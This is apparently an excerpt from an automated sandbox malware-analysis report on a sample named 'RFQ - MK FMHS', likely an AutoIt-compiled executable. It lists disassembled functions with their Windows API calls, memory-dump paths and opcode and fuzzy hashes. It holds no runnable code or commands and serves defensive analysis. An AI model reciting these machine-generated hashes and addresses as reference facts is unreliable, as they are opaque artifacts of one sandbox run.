                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 63a21aaedbe1afe9b447c49c40e6cfbec5f33137864e7910807c4da933849f20
                    • Instruction ID: 76778880648d8c89d5eca813102daca1107fc69a6a4c8b1299faed80fa0ac80f
                    • Opcode Fuzzy Hash: 63a21aaedbe1afe9b447c49c40e6cfbec5f33137864e7910807c4da933849f20
                    • Instruction Fuzzy Hash: 60516C36A00A19AFCF15DF64C845ABEB7F4EF58320F1054A9EA15B7351DB30AE41CB90
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00ECF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 00ECF469
                    • VariantClear.OLEAUT32(00000000), ref: 00ECF4C4
                    • _memmove.LIBCMT ref: 00ECF4EE
                    • VariantClear.OLEAUT32(?), ref: 00ECF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ECF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
                    • Instruction ID: f997d498c462ca7590d056fe1cf2ba65fea28bc8ea08f6a6ac055dde6b0b2af4
                    • Opcode Fuzzy Hash: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
                    • Instruction Fuzzy Hash: 5D516CB5A00209DFCB14CF58D880EAAB7B9FF4C314B158569ED59EB300D731E916CBA0
                    APIs
                    • _memset.LIBCMT ref: 00ED2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2792
                    • IsMenu.USER32(00000000), ref: 00ED27B2
                    • CreatePopupMenu.USER32 ref: 00ED27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 00ED2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00ED2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
                    • Instruction ID: dd56ba3e98ac0ce4025484064cc9baba4e66ddce2d75f2dc51ea7c5d9572ed76
                    • Opcode Fuzzy Hash: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
                    • Instruction Fuzzy Hash: 7B519F74A00205DFDF28CF68D888AADBBF5EF64318F10526EE611BB390D7719906DB51
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E7179A
                    • GetWindowRect.USER32(?,?), ref: 00E717FE
                    • ScreenToClient.USER32(?,?), ref: 00E7181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E7182C
                    • EndPaint.USER32(?,?), ref: 00E71876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
                    • Instruction ID: e219a1c4d3cc6517893a18f6a35312483c57050f27538babfaa9cc6ef14b64c5
                    • Opcode Fuzzy Hash: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
                    • Instruction Fuzzy Hash: 0B419471104304AFD710DF29CC84FBA7BE9EF4A724F148669F598EB2A2C7319845DB62
                    APIs
                    • ShowWindow.USER32(00F367B0,00000000,014B7648,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 00EFB9F0
                    • ShowWindow.USER32(00F367B0,00000000,014B7648,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFBA50
                    • ShowWindow.USER32(00000000,00000004,?,00EFB862,?,?), ref: 00EFBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 00EFBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EFBAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
                    • Instruction ID: e06649308c71dc6c34ed21c276bedc4ce7c71a789ddd4a2e3ac34e3ca9e906c6
                    • Opcode Fuzzy Hash: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
                    • Instruction Fuzzy Hash: D9417130600649AFDB21CF15C889BB57BE0FF45318F1852B9EB58AF6A2C771E845CB50
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00EE5134,?,?,00000000,00000001), ref: 00EE73BF
                      • Part of subcall function 00EE3C94: GetWindowRect.USER32(?,?), ref: 00EE3CA7
                    • GetDesktopWindow.USER32 ref: 00EE73E9
                    • GetWindowRect.USER32(00000000), ref: 00EE73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EE7422
                      • Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                    • GetCursorPos.USER32(?), ref: 00EE744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
                    • Instruction ID: 554b9e48d0e987f218eccc6954d24dc3868d54db6c6b0be4ee9942befefffb94
                    • Opcode Fuzzy Hash: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
                    • Instruction Fuzzy Hash: 1931E672508349AFD720DF15D849F9BBBE9FF88314F00191AF599A7191DB30E909CB92
                    APIs
                      • Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
                      • Part of subcall function 00EC85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
                      • Part of subcall function 00EC85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
                      • Part of subcall function 00EC85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
                      • Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E
                    • GetLengthSid.ADVAPI32(?,00000000,00EC8977), ref: 00EC8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC8DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 00EC8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00EC8977), ref: 00EC8DEC
                    • HeapFree.KERNEL32(00000000), ref: 00EC8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
                    • Instruction ID: 4b7e8857ce6132637f22573cf370121f4aca548a2f40784677d22116e2256641
                    • Opcode Fuzzy Hash: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
                    • Instruction Fuzzy Hash: D811CD32901604FFDB108B65CF08FBE7BADEF8031AF10412DE846A3251CB329905CB60
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00EC8B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC8B40
                    • CloseHandle.KERNEL32(00000004), ref: 00EC8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC8B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC8B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
                    • Instruction ID: 01550aa2a3868cca9d9e9e275c9c133d23b7df490a5b472cddf11dd1316ed857
                    • Opcode Fuzzy Hash: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
                    • Instruction Fuzzy Hash: F0115CB6501209AFDF018FA5DE49FEA7BA9EF48308F045069FE04B2160C7729D65DB60
                    APIs
                      • Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
                      • Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EFC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 00EFC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 00EFC1F6
                    • EndPath.GDI32(00000000), ref: 00EFC206
                    • StrokePath.GDI32(00000000), ref: 00EFC216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
                    • Instruction ID: 44b688d13b20a6b446358b9b66ac988828615a5e341820b719ad4a70e12fef54
                    • Opcode Fuzzy Hash: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
                    • Instruction Fuzzy Hash: 9B111E7640014CBFEF119F95DC88EAA7FADEF08354F148021FA1896171C7719D59DBA0
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
                    • Instruction ID: 4c69ff03713e93cd0a3626b6e629d664384f0ef561bd4e1738ead46a11ce0ad0
                    • Opcode Fuzzy Hash: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
                    • Instruction Fuzzy Hash: CF016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BE15C87941C7F5A868CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ED569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ED56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00ED56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
                    • Instruction ID: c8a83844d3149217fa10289ecfd537514fcd0f1d4e4590729898e6d8914860ba
                    • Opcode Fuzzy Hash: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
                    • Instruction Fuzzy Hash: 8DF06D32241118BFE3205BA39C0DEFF7A7CEFC6B11F000169FA04E11519AA05A05C6B5
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00ED74E5
                    • EnterCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E81044,?,?), ref: 00ED7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E81044,?,?), ref: 00ED7510
                      • Part of subcall function 00ED6ED7: CloseHandle.KERNEL32(00000000,?,00ED751D,?,00E81044,?,?), ref: 00ED6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7523
                    • LeaveCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
                    • Instruction ID: c73b3d7ca5aeeff471cbbb411a727af1e29398c169fcdfd7455e0ca3a0dab404
                    • Opcode Fuzzy Hash: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
                    • Instruction Fuzzy Hash: 43F05E3A540612EFEB111B65FC8C9FB7B2AEF85302B401532F602B11B1DB755906CB50
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC8E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 00EC8E8B
                    • CloseHandle.KERNEL32(?), ref: 00EC8E94
                    • CloseHandle.KERNEL32(?), ref: 00EC8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC8EA5
                    • HeapFree.KERNEL32(00000000), ref: 00EC8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
                    • Instruction ID: 5f6692e81d5d25afdd62524bd14063b5a6238b9034e4ab285ee684a5dc4a5087
                    • Opcode Fuzzy Hash: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
                    • Instruction Fuzzy Hash: 47E0C237005002FFDA012FE2EC0C92ABF69FFC9322B548231F219A10B1CB329428DB50
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EE8928
                    • CharUpperBuffW.USER32(?,?), ref: 00EE8A37
                    • VariantClear.OLEAUT32(?), ref: 00EE8BAF
                      • Part of subcall function 00ED7804: VariantInit.OLEAUT32(00000000), ref: 00ED7844
                      • Part of subcall function 00ED7804: VariantCopy.OLEAUT32(00000000,?), ref: 00ED784D
                      • Part of subcall function 00ED7804: VariantClear.OLEAUT32(00000000), ref: 00ED7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: c246cf4c3afbedaad57230ade6ae78253b30d3c573a3f767ff7d3d45aa6e7274
                    • Instruction ID: 17894da0a46245f810098a216296188bbe5454fc67b73166b03604901a7ab1be
                    • Opcode Fuzzy Hash: c246cf4c3afbedaad57230ade6ae78253b30d3c573a3f767ff7d3d45aa6e7274
                    • Instruction Fuzzy Hash: 3691BC75A083459FC700DF25C58096ABBE4EFC8314F04996EF89EAB362DB31E905CB52
                    APIs
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                    • _memset.LIBCMT ref: 00ED3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ED3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 019f66c45e003e7371a38cdb4e449e76a7ea6969429edb3d723cfc524329c0b8
                    • Instruction ID: 757aa4cd8e633f7a21de937452b022a4e022a263167b7cbad0e0bcb8ba06badc
                    • Opcode Fuzzy Hash: 019f66c45e003e7371a38cdb4e449e76a7ea6969429edb3d723cfc524329c0b8
                    • Instruction Fuzzy Hash: C151D031609302AED7259F38C845A6BB7E4EF45364F046A2EF895F3291DB70CE468763
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00ECDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00ECDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00ECDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: DllGetClassObject
                    • API String ID: 753597075-1075368562
                    • Opcode ID: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
                    • Instruction ID: 46af4e634bb86ddc7dfc1ba597ead8d23c08a45799fd219c2c3649885152bddb
                    • Opcode Fuzzy Hash: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
                    • Instruction Fuzzy Hash: 86418DB1604208DFDB04CF15CD84F9ABBB9EF44310F1590AEA905AF206D7B2DD45DBA0
                    APIs
                    • _memset.LIBCMT ref: 00ED2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ED2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00ED2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F36890,00000000), ref: 00ED2D5A
                    Strings
                    Memory Dump Source
